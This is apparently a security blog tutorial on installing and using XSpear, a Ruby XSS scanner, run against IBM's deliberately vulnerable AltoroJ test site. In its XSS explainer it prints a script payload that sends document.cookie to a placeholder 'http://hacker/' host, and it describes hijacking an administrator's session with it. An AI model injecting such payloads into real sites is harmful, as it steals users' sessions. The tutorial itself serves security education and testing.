XSpear Powerful XSS Scanner

xspear-banner

Xspear is a very powerful XSS scanning and parameter analysis tool on ruby gems, capable of both static and dynamic XSS vulnerability analysis.

In this article and video, I will show you how to install and use Xspear. This awesome tool has the ability to scan, detect and analyze potential XSS vulnerabilities on web applications.


XSpear Powerful XSS Scanner

What is (XSS) Cross-site Scripting

XSS is one of the most common hacking technique when it comes to web application vulnerabilities, and occurs when a web app generates an output based on user input.


XSS Example

The HTML snippet

<title>Document: %(title)</title>

is intended to show a template snippet that, if the variable title has value Cross-Site Scripting, results in the following HTML to be emitted to the browser:

<title>document: XSS Doc</title>

A site containing a search field does not have the proper input sanitizing. By crafting a search query looking something like this:

<SCRIPT>var+img=new+Image();img.src="http://hacker/"%20+%20document.cookie;</SCRIPT>

sitting on the other end, at the webserver, you will be receiving hits where after a double space is the user’s cookie. If an administrator clicks the link, an attacker could steal the session ID and hijack the session.


cross-site scripting example

In another subsequent article I would go further in Cross-site Scripting.


XSpear: Powerful XSS Scanning and Parameter Analysis Tool

It’s one of the XSS vulnerability scanning tools available on ruby gems that can run analysis on both responses and requests, including pattern matching based XSS scanning, Blind XSS testing as well as testing at selected parameters.


Key features

  • Pattern matching based XSS scanning
  • Detect alert confirm prompt event on headless browser (with Selenium)
  • Testing request/response for XSS protection bypass and reflected(or all) params
    • Reflected Params
    • All params(for blind XSS, anything)
    • Filtered test event handler HTML tag Special Char Useful code
    • Testing custom payload for only you!
  • Testing Blind XSS (with XSS Hunter, ezXSS, HBXSS, Etc all URL base blind test…)
  • Dynamic/Static Analysis
    • Find the SQL Error pattern
    • Analysis of Security headers(CSP HSTS X-frame-options, XSS-protection, etc.. )
    • Analysis Other headers..(Server version, Content-Type, etc…)
    • XSS Testing to URI Path
    • Testing Only Parameter Analysis (aka no-XSS mode)
  • Scanning from Raw file(Burp suite, ZAP Request)
  • XSpear running on ruby code(with Gem library)
  • Show table base cli-report and filtered rule, testing raw query(URL)
  • Testing at selected parameters
  • Support output format cli JSON HTML
    • cli
    • json
    • HTML
  • Support Verbose level (0~3)
    • 0: quite mode(only result)
    • 1: show scanning status(default)
    • 2: show scanning logs
    • 3: show detail log(req/res)
  • Support custom callback code to any test various attack vectors
  • Support Config file

Installation XSpear

Install it yourself as:

gem install XSpear

Or install it yourself as (local file / download latest ):

gem install XSpear-{version}.gem

Add this line to your application’s Gemfile:

gem 'XSpear'

And then execute:

bundle

Dependency gems

colorize selenium-webdriver terminal table progress_bar
If you configured it to install automatically in the Gem library, but it behaves abnormally, installs it with the following command.

gem install colorize

gem install selenium-webdriver

gem install terminal-table

gem install progress_bar

Usage XSpear

Run -h to get a list of available options:

sudo XSpear -h
)  (
 ( /(  )\ )
  )())(()/(          (     )  (
 (()\  /())`  )    ))\ ( /(  )(
 (()())  /(/(   /(())())(()\ \ \/ // |(()\ ()) (()_  ((_)
   < __ | '_ )/ -)/ ` || '| //_|___/| ./ _|__,|||    />
              |_|                   \ /<
   {\\\\\\\BYHAHWUL\\\\\(0):::<======================-
                                    / \<
                                       >       [ v1.4.1 ]
   Usage: xspear -u [target] -[options] [value]
   [ e.g ]
   $ xspear -u 'https://www.hahwul.com/?q=123' --cookie='role=admin' -v 1 -a 
   $ xspear -u 'http://testphp.vulnweb.com/listproducts.php?cat=123' -v 2
   $ xspear -u 'http://testphp.vulnweb.com/listproducts.php?cat=123' -v 0 -o json 
 [ Options ]
     -u, --url=target_URL             [required] Target Url
     -d, --data=POST Body             [optional] POST Method Body data
     -a, --test-all-params            [optional] test to all params(include not reflected)
         --no-xss                     [optional] no testing xss, only parameters analysis
         --headers=HEADERS            [optional] Add HTTP Headers
         --cookie=COOKIE              [optional] Add Cookie
         --custom-payload=FILENAME    [optional] Load custom payload json file
         --raw=FILENAME               [optional] Load raw file(e.g raw_sample.txt)
         --raw-ssl=BOOLEAN            [optional] http/https switch for burp raw file e.g: true/false
     -p, --param=PARAM                [optional] Test paramters
     -b, --BLIND=URL                  [optional] Add vector of Blind XSS
                                       + with XSS Hunter, ezXSS, HBXSS, etc…
                                       + e.g : -b https://hahwul.xss.ht
     -t, --threads=NUMBER             [optional] thread , default: 10
     -o, --output=FORMAT              [optional] Output format (cli , json, html)
     -c, --config=FILENAME            [optional] Using config.json
     -v, --verbose=0~3                [optional] Show log depth
                                       + v=0 : quite mode(only result)
                                       + v=1 : show scanning status(default)
                                       + v=2 : show scanning logs
                                       + v=3 : show detail log(req/res)
     -h, --help                       Prints this help
         --version                    Show XSpear version
         --update                     Show how to update

Example: Scanning XSS

Quite mode

sudo XSpear -u http://altoromutual.com/index.jsp?content=business_cards.htm -a -v2

Show scanning log

sudo XSpear -u http://altoromutual.com/index.jsp?content=personal.htm -a -v3 

XSS Test Website


(XSS) Cross-site Scripting Testing
Fortunately, there are companies that have set up certain “test websites“. They make it easier for us “Hackers” to test these kinds of tools and improve your skills. There are several such websites. I want to talk about that in a future article.

This web application is open source! Get your copy from GitHub and take advantage of advanced features

The AltoroJ website is published by IBM Corporation for the sole purpose of demonstrating the effectiveness of IBM products in detecting web application vulnerabilities and website defects.

This site is not a real banking site. Similarities, if any, to third party products and/or websites are purely coincidental. This site is provided “as is” without warranty of any kind, either express or implied. IBM does not assume any risk in relation to your use of this website.

If you’d like to try AltoroJ but want to skip all of the cool software development stuff, use publicly hosted version, available at http://altoromutual.com:8080/. You will not be able to enable any of the advanced options and this site may not always be available, but it’s the easiest way to get started


AltoroJ http://altoromutual.com/

XSpear Video

In this video, I’ll show you how to install and use XSpear. It is a handy tool for Bug Bounty. Be creative. And have fun.



IMPORTANT THINGS TO REMEMBER

✓ This Video and Article are made for educational purposes and pentest only.

* You will not misuse the information to gain unauthorized access.

✓ This information shall only be used to expand knowledge and not for causing malicious or damaging attacks…!


Read also the Disclaimer


All the techniques provided in the tutorials on the hackingpassion.com, YouTube channel and on the website hackingpassion.com are meant for educational purposes only.

If you are using any of those techniques for illegal purposes, hackingpassion.com can’t be held responsible for possible lawful consequences.

My goal is to educate people and increase awareness by exposing methods used by real black-hat hackers and show how to secure systems from these hackers.


Finally

If you have any questions about this article, any feedback, suggestions if you want to share your thoughts, please feel free to do so. Using the below comment form.


Bulls Eye
My name is Jolanda de Koff and on the internet, I'm also known as Bulls Eye. Ethical Hacker, Penetration tester, Researcher, Programmer, Self Learner, and forever n00b. Not necessarily in that order. Like to make my own hacking tools and I sometimes share them with you. "You can create art & beauty with a computer and Hacking is not a hobby but a way of life ..." I ♥ open-source and Linux"
error: Content is protected !!